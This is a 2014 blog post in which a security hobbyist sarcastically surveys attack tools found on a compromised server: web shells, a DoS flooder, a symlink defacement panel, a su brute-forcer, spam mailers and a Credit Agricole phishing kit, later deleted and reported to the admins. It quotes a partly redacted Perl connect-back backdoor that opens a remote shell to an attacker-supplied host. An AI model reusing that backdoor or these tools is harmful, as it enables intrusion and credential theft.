Monday, January 13, 2014 - shells and DoS and phishing, oh my

Started with a WSO shell. Cracked into it.

Find all sorts of hideous junk on here, including a Credit Agricole (French Bank) phishing kit.
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell shell mod b374k shell,
RootDaBitch tool - brute force local accounts using su - Credit Agricole kit

Ok, lets have a look.

(this was something like the 3rd WSO I found in here...seriously??)

MySQL Interface mod

Priv8 Shell
It literally tells me the password to the shell is 'priv8'

..and the password works. What an ugly piece of garbage too!

Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but symlinks arent working. Sorry buddy.
This thing stopped being useful a while ago.

Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer

VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell even though its called a shell.

Select the attack type

Target, http file, attack time

Does it look like b374k shell (below)? 
Yes, thats because this skilled hacker just changed a few lines of code and called it his own work. 
v3ry sw33t

If your eyes aren't already bleeding, get a load of this.

TurkBlackhats Shell

b374k shell (1923Turk)

This tool brute forces su to gain elevated privileges, uses suCrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?

Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 

(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:

PHP mailer, no panel, post method
/*Variaveis do Formulario*/
$nome = trim(@$_POST['nome']);/*recebe os dados digitados no campo "nome"*/
$email = trim(@$_POST['email']);/*recebe os dados digitados no campo "email"*/
$assunto_user = trim(@$_POST['assunto']);/*recebe os dados digitados no campo "assunto"*/
$mensagem = trim(@$_POST['mensagem']);/*recebe os dados digitados no campo "mensagem"*/

Perl back connect
#!/usr/bin/perl      use Socket;      print "Data Cha0s Connect Back Backdoor\n\n";      if (!$ARGV[0]) {        printf "Usage: $0 [Host] <Port>\n";        exit(1);      }      print "[*] Dumping Arguments\n";      $host = $ARGV[0];      $port = 80;      if ($ARGV[1]) {        $port = $ARGV[1];      }      print "[*] Connecting...\n";      $proto = getprotobyname('tcp') || die("Unknown Protocol\n");      [...redacted]        die("Unable to Connect\n");      }      print "[*] Spawning Shell\n";      if (!fork( )) {        [...redatcted]        exec {'/bin/sh'} '-bash' . "\0" x 4;        exit(0);      }      print "[*] Datached\n\n";

Last but not least.

Credit Agricole phishing kit -
Includes js, php, images, etc. for phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. 
Phishing pages:

I deleted all of this junk. All the shells, phishing pages, mailers, DoS 'shell'.. all of it.  I emailed the admins too. operacional[at]

No comments:

Post a Comment